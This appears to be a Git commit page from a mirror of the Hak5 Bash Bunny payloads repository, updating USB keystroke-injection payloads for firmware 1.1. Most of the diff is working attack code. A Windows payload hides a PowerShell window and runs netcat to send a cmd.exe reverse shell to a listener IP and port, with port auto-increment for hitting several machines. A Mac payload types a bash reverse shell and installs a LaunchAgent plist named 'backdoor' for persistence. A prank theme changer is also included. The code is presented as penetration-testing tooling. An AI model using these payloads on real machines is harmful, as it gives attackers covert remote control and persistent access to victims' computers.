hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated payloads for fw v1.1 (#176) 

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Fixed additional MacReverseShell

* Added readme.md files

* Added readme.md files

* Added readme.md

* Added readme.md files

* Added readme.md files

* Updated for firmware 1.1

* Updated for firmware 1.1

* Added ThemeChanger and updated for firmware 1.1

* Updated readme.md

* Updated for firmware 1.1 - using RUN command

* Fixed issues with the new RUN - reverted

* Fixed a few script problems

* removed binary and updated readme.md

* added a check for themepack

* edited themechanger readme

* updated readme.md and version
pull/207/head
RalphyZ 2017-04-28 18:49:35 -04:00 committed by Sebastian Kinne
parent ca9e53c5a8
commit 750d384df7
9 changed files with 278 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
payloads/library/execution/RAZ_VBScript/a.vbs
View File

@ -3,7 +3,7 @@ Option Explicit
'============================================================================== '==============================================================================
' Title: a.vbs ' Title: a.vbs
' Author: RalphyZ ' Author: RalphyZ
' Version: 1.0 ' Version: 1.1
' Target: Windows 7+ ' Target: Windows 7+
' '
' Description: ' Description:
@ -16,7 +16,8 @@ Option Explicit
' listeners while doing a PenTest, and grab multiple reverse ' listeners while doing a PenTest, and grab multiple reverse
' shells in one trip. Uncomment that if you want the auto-increment ' shells in one trip. Uncomment that if you want the auto-increment
' '
' Note: You must put the netcat executable in the strReverseShellPath directory ' Note: You must put the netcat executable in the switch directory with this
' script in order for it to work
'============================================================================== '==============================================================================
' Declare Constants ' Declare Constants
@ -26,14 +27,11 @@ Const ForWriting = 2
' Declare Global Variables ' Declare Global Variables
Dim strListenerPort, strNewListenerPort, strListenerIP Dim strListenerPort, strNewListenerPort, strListenerIP
Dim objFSO, objFile, strCurrentDirectory Dim objFSO, objFile, strCurrentDirectory
Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile Dim strNetCatEXE, strListnerPortFile, strListenerIPFile
' The netcat executable name ' The netcat executable name
strNetCatEXE = "nc.exe" strNetCatEXE = "nc.exe"
' The folder location
strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
' The file containing the listener port ' The file containing the listener port
strListnerPortFile = "listener_port.txt" strListnerPortFile = "listener_port.txt"
@ -43,7 +41,11 @@ strListenerIPFile = "listener_ip.txt"
' Create a File System Object ' Create a File System Object
Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFSO = CreateObject("Scripting.FileSystemObject")
strCurrentDirectory = FindCurrentDirectory() ' Set default value
strCurrentDirectory = ""
' The folder location
FindCurrentDirectory
' Read the Host IP Address (where the listener resides) ' Read the Host IP Address (where the listener resides)
ReadHostIP ReadHostIP
@ -64,20 +66,21 @@ StartNetCat
' Return Value: None ' Return Value: None
' Description: Find the netcat executable ' Description: Find the netcat executable
'============================================================================== '==============================================================================
Function FindCurrentDirectory sub FindCurrentDirectory
Dim objDrives, d Dim objDrives, d
' Set default return value
FindCurrentDirectory = ""
' Search all drives for the netcat exe ' Search all drives for the netcat exe
Set objDrives = objFSO.Drives Set objDrives = objFSO.Drives
For Each d in objDrives For Each d in objDrives
If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then
FindCurrentDirectory = d + strReverseShellPath strCurrentDirectory = d + "\payloads\switch1\"
exit sub
ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then
strCurrentDirectory = d + "\payloads\switch2\"
exit sub
End if End if
Next Next
End Function End Sub
'============================================================================== '==============================================================================
' Name: ReadHostIP ' Name: ReadHostIP

35
payloads/library/execution/RAZ_VBScript/payload.txt
View File

@ -2,34 +2,45 @@
# #
# Title: RAZ_VBScript # Title: RAZ_VBScript
# Author: RalphyZ # Author: RalphyZ
# Version: 1.0 # Version: 1.1
# Target: Windows 7+ # Target: Windows 7+
# Dependencies: VBScript (a.vbs) in the switch folder with this file # Dependencies: VBScript (a.vbs) in the switch folder with this file
# #
# Description: Executes a VBScript, concealed in a hidden PowerShell window # Description: Executes a VBScript, concealed in a hidden PowerShell window
# #
# Colors: # Colors:
# Green.....................Working # | Status | Color | Description |
# White.....................Completed without error # | ---------- | ------------------------------| ------------------------------------------------ |
# Light-Blue (blinking).....a.vbs was not found # | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | FAIL | Red slow blink | Could not find the a.vbs script |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
LED G # Magenta solid
LED SETUP
# Set the attack mode
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
# Get the switch position # Get the switch position
source bunny_helpers.sh GET SWITCH_POSITION
# Check if a.vbs is present Check if a.vbs is present
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
LED B G 100 LED FAIL
exit 1 exit 1
fi fi
# Start the attack - yellow single blink
LED ATTACK
# Run the VBScript # Run the VBScript
QUACK GUI r QUACK GUI r
QUACK DELAY 100 QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe"
QUACK ENTER QUACK ENTER
# Green LED for finished
LED R G B # Green 1000ms VERYFAST blink followed by SOLID
LED FINISH
exit 0

31
payloads/library/execution/RAZ_VBScript/readme.md Normal file
View File

@ -0,0 +1,31 @@
# RAZ_VBScript
* Author: RalphyZ
* Version: 1.1
* Target: Windows 7+
* Category: Execution
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
a.vbs - VBScript to be executed in a hidden Powershell window
## Description
VBScript (a.vbs) in the switch folder with this file
## Configuration
None
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL | Red slow blink | Could not find the a.vbs script |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |

48
payloads/library/prank/RAZ_ThemeChanger/payload.txt Normal file
View File

@ -0,0 +1,48 @@
#!/bin/bash
#
# Title: Change windows theme
# Author: sil3n7h
# Version: 1.2
# Target: Windows 7+
#
# Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder
# in the payloads library of the Bash Bunny USB Disk partition.
#
# Colors:
# | Status | Color | Description |
# | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | FAIL1 | Red slow blink | Could not find the theme.themepack file |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
# Magenta solid
LED SETUP
# Get the switch position
GET SWITCH_POSITION
# Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/theme.themepack" ] ; then
LED FAIL1
exit 1
fi
# Set the attack mode to HID and STORAGE
ATTACKMODE HID STORAGE
# Yellow single blink
LED ATTACK
# Run the command to change the theme
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\theme.themepack')"
QUACK ENTER
# Wait a bit so that the correct window closes
QUACK DELAY 15000
QUACK ALT F4
# Green LED for finished
LED FINISH

34
payloads/library/prank/RAZ_ThemeChanger/readme.md Normal file
View File

@ -0,0 +1,34 @@
# RAZ_ThemeChanger
* Author: sil3n7h
* Version: 1.2
* Target: Windows 7+
* Category: Prank
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ---------------------------------------|
| 1.2 | Updated docs and check for themepack |
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
theme.themepack - The Windows theme file used to set the wallpaper and colors of the screen.
Note: themepack files are windows zipfiles which contain wallpapers and other files (screensavers, sounds, etc). You can export your own themepack using Windows GUIs. Just look it up `exporting a windows themepack`.
## Description
Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder in the payloads library of the Bash Bunny USB Disk partition.
## Configuration
None
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL1 | Red slow blink | Could not find the theme.themepack file |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |

25
payloads/library/remote_access/RAZ_MacReverseShell/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: RAZ_MacReverseShell # Title: RAZ_MacReverseShell
# Author: RalphyZ # Author: RalphyZ
# Version: 1.1 # Version: 1.2
# Target: Mac OSX # Target: Mac OSX
# Dependencies: None # Dependencies: None
# #
@ -12,8 +12,14 @@
# user-defined interval # user-defined interval
# #
# Colors: # Colors:
# Green (blinking)..........Working # | Status | Color | Description |
# White.....................Completed without error # | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
#Magenta solid
LED SETUP
# Edit this to point to the NetCat Listener # Edit this to point to the NetCat Listener
LISTENER_IP="192.168.1.100" LISTENER_IP="192.168.1.100"
@ -24,15 +30,15 @@ FREQUENCY="60"
#----Proceed with Caution------------------------------------------------------ #----Proceed with Caution------------------------------------------------------
# Green blinking LED
LED G 100
# Human Interface Device # Human Interface Device
ATTACKMODE HID ATTACKMODE HID
# Emulate the Ducky - QUACK! # Emulate the Ducky - QUACK!
QUACK DEFAULT_DELAY 300 QUACK DEFAULT_DELAY 300
# Start the attack - yellow single blink
LED ATTACK
# Start the Mac Terminal # Start the Mac Terminal
QUACK COMMAND SPACE QUACK COMMAND SPACE
QUACK STRING terminal QUACK STRING terminal
@ -53,7 +59,7 @@ QUACK ENTER
QUACK DELAY 500 QUACK DELAY 500
# Add to the Launch Agents # Add to the Launch Agents
QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\\n \<dict\>\\n \<key\>Label\</key\>\\n \<string\>com.ralphyz.backdoor\</string\>\\n \<key\>ProgramArguments\</key\>\\n \<array\>\\n \<string\>/bin/sh\</string\>\\n \<string\>/tmp/s.sh\</string\>\\n \</array\>\\n \<key\>RunAtLoad\</key\>\\n \<true/\>\\n \<key\>StartInterval\</key\>\\n \<integer\>${FREQUENCY}\</integer\>\\n \<key\>AbandonProcessGroup\</key\>\\n \<true/\>\\n \</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\<dict\>\<key\>Label\</key\>\<string\>com.ralphyz.backdoor\</string\>\<key\>ProgramArguments\</key\>\<array\>\<string\>/bin/sh\</string\>\<string\>/tmp/s.sh\</string\>\</array\>\<key\>RunAtLoad\</key\>\<true/\>\<key\>StartInterval\</key\>\<integer\>${FREQUENCY}\</integer\>\<key\>AbandonProcessGroup\</key\>\<true/\>\</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
QUACK ENTER QUACK ENTER
QUACK DELAY 500 QUACK DELAY 500
@ -64,5 +70,6 @@ QUACK ENTER
# Close the Terminal Window # Close the Terminal Window
QUACK COMMAND q QUACK COMMAND q
# White LED for finished # Green 1000ms VERYFAST blink followed by SOLID
LED R G B LED FINISH
exit 0

39
payloads/library/remote_access/RAZ_MacReverseShell/readme.md Normal file
View File

@ -0,0 +1,39 @@
# RAZ_MacReverseShell
* Author: RalphyZ
* Version: Version 1.1.1
* Target: Mac OSX
* Category: Reverse Shell
* Attackmode: HID
## Change Log
| Version | Changes |
| ------- | ---------------------------------------- |
| 1.1.1 | Updated for firmware 1.1.1 |
| 1.1 | Added variables for easier customization |
| 1.0 | Initial release |
## Dependencies
None
## Description
Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, /tmp/s.sh. It then adds the script to the Launch Agent - establishing persistence - running at startup
## Configuration
Set the location of your listener:
LISTENER_IP="192.168.1.100"
LISTENER_PORT="4444"
Set the frequency you want the script to run (in minutes)
FREQUENCY="60"
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |

42
payloads/library/remote_access/RAZ_ReverseShell/payload.txt
View File

@ -13,63 +13,69 @@
# Intentionally, this script leaves a trace in the Run Box # Intentionally, this script leaves a trace in the Run Box
# #
# Colors: # Colors:
# Green.....................Working # | Status | Color | Description |
# White.....................Completed without error # | ---------- | ------------------------------| ------------------------------------------------ |
# White (blinking)..........Incrementing the port in listener_port.txt # | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# Blue (blinking)...........listener_port.txt was not found # | FAIL1 | Red slow blink | Could not find the listener_port.txt file |
# Light-Blue (blinking).....listener_ip.txt was not found # | FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
# Amber (blinking)..........nc.exe was not found # | FAIL3 | Red very fast blink | Could not find the nc.exe file |
# | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
# Magenta solid
LED SETUP
# Change this if you want to enable auto_increment of the netcat port # Change this if you want to enable auto_increment of the netcat port
# If true, the port number is increased by 1 everytime the script runs # If true, the port number is increased by 1 everytime the script runs
# This is good for Red Teams doing PenTesting on multiple computers # This is good for Red Teams doing PenTesting on multiple computers
auto_increment=false auto_increment=false
LED G # Set attack mode to HID and Storage
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
LANGUAGE='us'
# Get the switch position # Get the switch position
source bunny_helpers.sh GET SWITCH_POSITION
# Check for all the files - error if not found. If found, put into variables # Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
LED B 100 LED FAIL1
exit 1 exit 1
else else
my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
fi fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
LED B G 100 LED FAIL2
exit 1 exit 1
else else
my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
fi fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
LED R G 100 LED FAIL3
exit 1 exit 1
fi fi
# Start the attack - yellow single blink
LED ATTACK
# Execute the powershell command in the run box with the appropriate variables # Execute the powershell command in the run box with the appropriate variables
QUACK GUI r QUACK GUI r
QUACK DELAY 100 QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"
QUACK ENTER QUACK ENTER
# If auto_increment, then update the listener_port file # If auto_increment, then update the listener_port file
if [ "$auto_increment" = true ] ; then if [ "$auto_increment" = true ] ; then
LED R G B 100 LED SPECIAL
echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
# Allow the write to sync to the USB # Allow the write to sync to the USB
sleep 1 sleep 1
fi fi
# Signal everything went OK - white # Green 1000ms VERYFAST blink followed by SOLID
LED R G B LED FINISH
exit 0 exit 0

44
payloads/library/remote_access/RAZ_ReverseShell/readme.md Normal file
View File

@ -0,0 +1,44 @@
# RAZ_ReverseShell
* Author: RalphyZ
* Version: 1.1
* Target: Windows 7+
* Category: Reverse Shell
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
nc.exe - Windows binary for netcat with the -e flag
Find nc.exe on Kali, or on NMap's website: http://nmap.org/ncat
listener_port.txt - The Port number for the netcat listener
listener_ip.txt - The IP Address for the netcat listener
## Description
Executes a netcat reverse cmd shell at a given IP and Port. This script leaves a trace in the Run Box. The script can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office.
## Configuration
Set the location of your listener in the listener_ip and listener_port text files.
If you want the listener port to auto-increment, set:
auto_increment=true
## Colors
| Status | Color | Description |
| ---------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL1 | Red slow blink | Could not find the listener_port.txt file |
| FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
| FAIL3 | Red very fast blink | Could not find the nc.exe file |
| SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |